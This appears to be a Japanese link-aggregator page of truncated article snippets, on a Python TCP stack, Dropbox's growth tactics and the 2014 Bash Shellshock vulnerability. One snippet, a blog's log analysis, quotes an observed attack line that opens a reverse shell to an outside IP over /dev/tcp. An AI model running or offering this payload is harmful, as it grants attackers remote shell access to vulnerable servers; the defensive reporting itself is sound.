PythonでTCPスタックを記述するとどうなる? | POSTD
Hacker School在籍中、ネットワーキングの理解をより深めたいと思い、小規模なTCPスタックを書いてみようと思い立ちました。個人的には、C言語よりもPythonの方になじみがありましたし、その頃ちょうど、パケット送信を 非常に簡単に する scapy ネットワーキングライブラリも見つけたところでした。 そんなわけで、 teeceepee を書き始めました。 基本的な構想は次のとおりです。 TCPパケットを送信可能にするRaw socketを開く google.comを取得するためにHTTP要求を送る 応答を取得しパースする 成功を祝う 適切なエラー処理などについてはさほどの注意も払わず、ただただウェブページを取得し、勝利を宣言しようと思っていました(^_^) ステップ1:TCPハンドシェイク 手始めは、GoogleとのTCPハンドシェイクです(以下は必ずしも正しく動作しませんが、原
これがシリコンバレー流グロースハック!Dropboxが一晩に7万人を集めた方法 | Tokyo Otaku Mode Blog
この記事は、Quora(米国のQ&Aサイト)に投稿されたものを、私たちTokyo Otaku Modeが日本語に翻訳したものです。執筆者はMarkus KirjonenさんというUIデザイナーの方で、スタートアップについて多く書かれています。私たちはMarkusさんから許可をいただき、この投稿を日本語に翻訳して日本で発信する機会を得ることができました。今回から合計6回にわたり、有名スタートアップ企業がどんな方法で新規ユーザーを手に入れたのかについて、実例をもとに紹介していきます。ユーザー確保に悩んでいる方! これからユーザーを獲得していきたい方! 成功するスタートアップへのヒントを得たい方! 必読です!! 紹介する実例はどれも大成功したものばかりですので、必ずどこかに参考となる情報が潜んでいることでしょう。 Dropboxの成長は目覚ましい。彼らはたった5年で、約1億人もの新規ユーザーを獲
/dev/tcpによるbashのソケット通信
件のbashの脆弱性が残っていることを期待したアクセスについて、24時間ほど前には来てなかったんですが、さきほどログを見てみたらちょっとだけ来てました。 ログに残るのは User-Agent ぐらいなのですが、ほかのフィールドで試している輩もいることでしょう。 アクセス元を逆引きしてみたんですが、クラウドサービスばっかりでした(一個だけ shodan.io なるドメインの下のIPアドレスからあったのだけど、なんだろう……)。 さて、() { :;}; の後になにをやってるのか、というのなんですが、一つ THIS IS VULNERABLE と echo するだけという人がいました。警告のつもりなのか、手動で何か確認しているのかな。あとはpingだな……と思ってたんですが、ちょっと特異なものが。 /bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
Bash の脆弱性について
CVE-2014-6271 の件について、何かわかってない記事が散見されるので簡単にまとめ。 問題点 環境変数が特殊な文字列の場合、Bash はそれを関数定義とみなす(この仕様がそもそもどうなのよ、と思う人は/bin/shをbashにするのはもうやめましょう)。そのロジックに誤りがあり、関数定義でない部分も読み込み、その部分が実行されてしまう。 影響範囲 /bin/sh が bash でないシステムの場合 明示的に bash スクリプトとして起動されたスクリプトだけが影響を受ける。ただし SSH サーバーの場合、ユーザープログラムを実行する場合にユーザーのシェルを使用するので、そこで影響を受けることがある。 /bin/sh が bash であるシステムの場合 system(3) や popen(3) が内部で /bin/sh を利用しているので、影響は広範に渡る。 CGI 特に話題になって
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
国内iPhone 6/Plusの初速はシリーズ過去最大